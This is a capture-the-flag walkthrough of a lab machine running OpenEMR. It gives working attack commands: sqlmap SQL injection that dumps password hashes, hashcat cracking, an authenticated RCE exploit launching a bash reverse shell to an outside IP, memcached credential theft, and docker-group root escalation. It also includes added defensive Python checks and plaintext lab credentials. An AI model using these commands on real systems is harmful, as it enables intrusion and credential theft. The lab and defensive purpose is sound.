```bash
nmap -p- --min-rate 10000 10.10.10.188 -Pn
```

After finding the open ports, let's run a more detailed nmap scan against just those ports.

```bash
nmap -A -sC -sV -p22,80 10.10.10.188 -Pn
```

I see some stuff on the web application that's interesting for me.


It means that there can be another application (Hospital Management System).

That's why I modified the '/etc/hosts' file by adding the cache.htb and hms.htb domain names.

I opened the application and it is the 'OpenEMR' CMS system. I browsed the /portal endpoint.

Then I found a .pdf file for this CMS system; let's do an error-based SQL injection attack.

Let's save this request as a .req file and attack it via the sqlmap tool.

```bash
sqlmap -r error.req --level 5 --risk 3 --technique "E"
```

Let's enumerate the databases by adding the --dbs option.

Enumerate the tables of a specific database with -D openemr --tables.

I select the table named 'users_secure'; let's add it to the sqlmap command with the options -T users_secure --dump.

Final sqlmap command:

```bash
sqlmap -r error.req --level 5 --risk 3 --technique "E" -D 'openemr' -T 'users_secure' --dump
```
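The reason an error-based technique works against the portal is that the application builds SQL from request input and passes database errors back to the client. The following is an added example written for this writeup, not code from OpenEMR or from the original page; it uses a constructed in-memory SQLite table (sample rows, not data from the target) to contrast a concatenated query with a parameterized one, which is the fix that makes the whole `--technique "E"` class of attack inert.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for an application user table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', '$2a$10$constructed-placeholder-hash')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    # Concatenation: the input is parsed as part of the SQL grammar, so a stray
    # quote produces a database error and a boolean tail changes the WHERE clause.
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    # Placeholder binding: the driver sends the value separately from the statement;
    # it can only ever be compared as a string, never alter the query.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def probe(fn, conn, value):
    """Run a lookup and report ('ok', rows) or ('error', message).

    A web tier that relays the 'error' branch verbatim is what error-based
    injection tooling reads; a fixed handler returns a generic message instead.
    """
    try:
        return ("ok", fn(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("admin", "'", "' OR '1'='1"):
        print(repr(value), "concat ->", probe(lookup_vulnerable, db, value),
              "| param ->", probe(lookup_parameterized, db, value))
```

With a lone quote the concatenated version raises a parser error (the signal sqlmap keys on), and with the classic boolean tail it returns every row; the parameterized version returns an empty result for both inputs and the correct row for a normal username.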

Now it's time to crack this hash via the hashcat tool.

```bash
hashcat -m 3200 hash.txt --wordlist /usr/share/wordlists/rockyou.txt
```

I found an authenticated RCE exploit in this repository.

Let's use this exploit (45161).

openemr_admin: xxxxxx

```bash
python2 45161.py -u openemr_admin -p xxxxxx -c 'bash -c "bash -i >& /dev/tcp/10.10.14.5/1337 0>&1"' http://hms.htb
```

I got a reverse shell on port 1337.

Let's make the shell interactive.

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
```

I got the password of the ash user from the file 'functionality.js' in the /jquery directory.

ash: H@v3_fun
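A credential sitting in a public JavaScript file is the kind of thing a pre-deployment check should catch. The scanner below is an added example for this writeup (not code from the original page or from OpenEMR); it runs over a constructed JS snippet embedded inline, with invented sample values, and reports hard-coded secrets in both assignments and `user:pass` pairs left in comments.

```python
import re

# Constructed sample of a static asset, not the real functionality.js from the box.
SAMPLE_JS = """\
// TODO remove: ash:exampleP@ss  (dev login)
var apiKey = "abc123-not-a-real-key";
function login(u, p) { return fetch('/portal/login', {method: 'POST'}); }
const password = 'h4rdc0ded';
"""

# key = "value" / key: 'value' where key looks like a secret name (case-insensitive)
CRED_RE = re.compile(
    r"""(?i)\b(pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*['"]([^'"]{4,})['"]"""
)
# user:password pairs, only considered inside comment lines to limit noise
USERPASS_RE = re.compile(r"\b([a-z_][a-z0-9_]{2,31}):(\S{6,})\b")


def find_credentials(text):
    """Return (line_number, key_or_user, value) for every suspected hard-coded credential."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CRED_RE.finditer(line):
            hits.append((lineno, m.group(1), m.group(2)))
        if line.lstrip().startswith(("//", "/*", "*")):
            for m in USERPASS_RE.finditer(line):
                hits.append((lineno, m.group(1), m.group(2)))
    return hits


def scan_files(paths):
    """Convenience wrapper for real use: scan a list of files, keyed by path."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = find_credentials(fh.read())
        if found:
            report[path] = found
    return report


if __name__ == "__main__":
    for lineno, key, value in find_credentials(SAMPLE_JS):
        print(f"line {lineno}: {key} -> {value[:3]}***")
```

Run it against the web root's static directories (`scan_files(glob.glob("web/**/*.js", recursive=True))`) as a CI step; the patterns are deliberately broad, so triage the hits rather than treating every match as a finding.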

user.txt


While running the netstat -tnpl command I see that port 11211 is open.

That belongs to 'memcached'; let's connect to it via telnet.

```bash
telnet 127.0.0.1 11211
```

I got credentials from here with `get user` and `get passwd`.

luffy: 0n3_p1ec3
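Memcached has no authentication by default, so whoever can reach the port can read every key. The audit below is an added example for this writeup (not code from the original page or from the memcached project); it parses two constructed `/etc/memcached.conf`-style texts, a weak one and a hardened one, and flags a non-loopback listen address, UDP left enabled and missing SASL (`-S`). Note what it cannot catch: the box's instance was already bound to 127.0.0.1, and the real problem was that plaintext credentials were stored in the cache where any local account could fetch them, which only a "never cache secrets" rule addresses.

```python
import ipaddress

WEAK_CONF = """\
# constructed sample memcached.conf (weak settings)
-m 64
-p 11211
-u memcache
-l 0.0.0.0
"""

HARDENED_CONF = """\
# constructed sample memcached.conf (hardened settings)
-m 64
-p 11211
-u memcache
-l 127.0.0.1
-U 0
-S
"""


def parse_memcached_conf(text):
    """Map each '-x value' option line to its value ('' for bare flags); comments ignored."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.startswith("-"):
            continue
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return opts


def _is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:  # hostname or garbage: treat as not provably local
        return addr in ("localhost",)


def audit_memcached_conf(text):
    """Return a list of human-readable findings; an empty list means the checks passed."""
    opts = parse_memcached_conf(text)
    findings = []
    listen = opts.get("-l")
    if listen is None:
        findings.append("no -l option: daemon listens on all interfaces")
    elif not all(_is_loopback(a.strip()) for a in listen.split(",")):
        findings.append(f"-l {listen}: reachable from other hosts")
    if opts.get("-U") != "0":
        findings.append("UDP not explicitly disabled (-U 0): anonymous reads and amplification")
    if "-S" not in opts:
        findings.append("no -S: SASL authentication is off, any client can read all keys")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_memcached_conf(conf) or ["ok"])
```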

I just ssh'd into the machine with these credentials.

I ran the id command to learn what groups the luffy user has for privilege escalation.

The docker group can be exploited; I also found a predefined docker image via the docker image ls command.

I looked up the exploit on GTFOBins.

That's an Ubuntu image; let's run it to gain a root shell.

```bash
docker run -v /:/mnt -i -t ubuntu bash
```

Reminder! We can gain a root shell by copying /bin/bash, giving it the SUID bit and running it as the luffy user.

```bash
cp bin/bash home/luffy/dr4ks
chmod 4777 home/luffy/dr4ks
exit # to get back to the luffy user
./dr4ks -p # to gain the root shell
```
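Both halves of this escalation leave artifacts a host check can find: a non-admin account in the docker group (root-equivalent when the daemon runs as root) and a root-owned SUID copy of a shell sitting in a home directory. The script below is an added example for this writeup, not code from the original page or from Docker; the `/etc/group` excerpt and the file listing are constructed samples, and `scan_directory` is a hypothetical helper that applies the same test to a live filesystem.

```python
import os
import stat

# Constructed /etc/group excerpt (sample data, not the target's file).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:999:luffy
luffy:x:1001:
"""

# Constructed listing of (path, st_mode, st_uid), as os.lstat would report them.
SAMPLE_FILES = [
    ("/home/luffy/dr4ks", 0o104777, 0),    # regular file, mode 4777, owned by root
    ("/home/luffy/.bashrc", 0o100644, 1001),
    ("/home/ash/notes.txt", 0o100600, 1002),
    ("/usr/bin/passwd", 0o104755, 0),      # legitimate SUID binary outside /home
]

WATCHED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def docker_group_members(group_text):
    """Usernames listed as members of the docker group in /etc/group text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def suspicious_suid_files(entries, prefixes=WATCHED_PREFIXES):
    """Root-owned SUID regular files under user-writable locations."""
    flagged = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):
            continue
        if mode & stat.S_ISUID and uid == 0 and path.startswith(prefixes):
            flagged.append(path)
    return flagged


def scan_directory(root):
    """Hypothetical live-host helper: walk a tree and feed lstat results to the check above."""
    entries = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            entries.append((path, st.st_mode, st.st_uid))
    return suspicious_suid_files(entries)


if __name__ == "__main__":
    print("docker group members:", docker_group_members(SAMPLE_GROUP))
    print("suspicious SUID files:", suspicious_suid_files(SAMPLE_FILES))
```

On a real host the same two questions are `getent group docker` and `find /home /tmp -perm -4000 -uid 0 -type f`; the functions here exist so the result can be asserted on by a config-compliance test or fed to a SIEM rather than eyeballed.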

root.txt
